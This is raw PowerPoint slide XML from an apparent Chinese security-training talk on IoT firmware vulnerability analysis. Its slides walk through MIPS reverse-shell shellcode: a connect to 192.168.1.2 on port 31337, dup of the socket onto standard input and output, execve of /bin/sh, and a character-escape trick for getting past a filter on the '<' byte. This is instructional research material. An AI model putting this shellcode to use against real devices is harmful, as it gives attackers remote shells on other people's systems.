          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1786255"/>
            <a:ext cx="7108825" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sw v0, -1(sp)</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lw a0, -1(sp)</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li t7, -3</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nor t7,t7,zero</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sw t7, -32(sp)</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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ori t3,t3,0xff5c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lui t6, 0x7a69	# \x3c\x0e\x7a\x69</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</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ori t6, t6, 0x7a69</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sw t6, -28(sp)</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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ori t3,t3,0xff5c</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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lui t7, 0xc0a8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ori t7, t7, 0x102</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sw      t7,-26(sp)</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addi a1, sp, -30</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li t4, -17</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nor a2, t4, zero</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li v0, 4170</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall 0x40404</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>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3458210" y="3186430"/>
            <a:ext cx="5694680" cy="1645920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3405505" y="3211195"/>
            <a:ext cx="5693410" cy="1610360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="C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3882390" y="1670050"/>
            <a:ext cx="5092065" cy="1412240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2595880" y="2931795"/>
            <a:ext cx="352425" cy="254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531995" y="861695"/>
            <a:ext cx="2656840" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x3c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无法直接使用！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接箭头连接符 7"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2805430" y="1045845"/>
            <a:ext cx="1726565" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>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6163945" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>利用字符逃逸绕过编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611505" y="178625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ori $t3,$t3,0xff3c	=&gt; 	\x35\x6b\xff\x3c</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lui $t9,0x7a69</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4227830" y="1868805"/>
            <a:ext cx="361315" cy="27241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589145" y="2498725"/>
            <a:ext cx="1452245" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x5c\x3c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="直接箭头连接符 9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4408805" y="2141220"/>
            <a:ext cx="655955" cy="431165"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:tailEnd type="arrow" w="med" len="med"/>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4756785" y="2058670"/>
            <a:ext cx="1470025" cy="306705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>编码为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\&lt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5037455" y="2531745"/>
            <a:ext cx="440055" cy="29019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424805" y="3290570"/>
            <a:ext cx="1777365" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\x3c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\x0e\x7a\x69</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5407660" y="3308350"/>
            <a:ext cx="1812925" cy="32575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a:stCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="2821940"/>
            <a:ext cx="264160" cy="459740"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="F8F8F8">
                  <a:alpha val="100000"/>
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="38100" y="3627755"/>
            <a:ext cx="5880100" cy="1163955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="14400000">
            <a:off x="5462905" y="3762375"/>
            <a:ext cx="736600" cy="736600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226810" y="4144010"/>
            <a:ext cx="1732280" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>无效汇编代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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6163945" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dup(sock,0);dup(sock,1);dup(sock,2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="7108825" cy="258445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li t7, -3</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nor a1, t7, zero		# a1 = 2</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lw a0, -1(sp)		# a0 = sock</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li v0, 4063</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syscall 0x40404		# dup(sock,2)</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addi a1, a1, -1</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li at, -1</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bne a1, at, 0xfffffffffffffff0		# loop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bne	a1,at,0x7d7fedfc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A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6163945" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execve(“/bin/sh”,0,0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="7108825" cy="2030095"/>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slti    a2,zero,-1		# if(0&lt;-1) a2=1 else a2=0</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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ori t3,t3,0xff5c</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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lui a0, 0x77f9</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ori a0, a0, 0x2d28		# a0 = “/bin/sh” address</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slti a1, zero, -1		# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>if(0&lt;-1) a2=1 else a2=0</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li v0, 4011</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syscall 0x40404		# execve(“/bin/sh”,0,0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A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实战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>固件漏洞分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1299845"/>
            <a:ext cx="6163945" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exit(0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="7108825" cy="92202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li v0, 4001</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slti a0,zero,-1		# a0 = 0 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall 0x40404		# exit(0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A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固件安全概述</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固件在硬件中的存储</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="5825490"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CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内部</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外部 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nor flash/Nand flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3457575" y="193675"/>
            <a:ext cx="5633085" cy="45758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欢迎关注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加入我们</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5266690" y="1028065"/>
            <a:ext cx="2927985" cy="3811270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675005" y="2390140"/>
            <a:ext cx="3343910" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安恒信息安全研究院 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>公众号</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PT"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1270"/>
            <a:ext cx="9144000" cy="5151120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="PPT"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="737870" y="4595495"/>
            <a:ext cx="1505585" cy="113030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737870" y="1779905"/>
            <a:ext cx="2233930" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
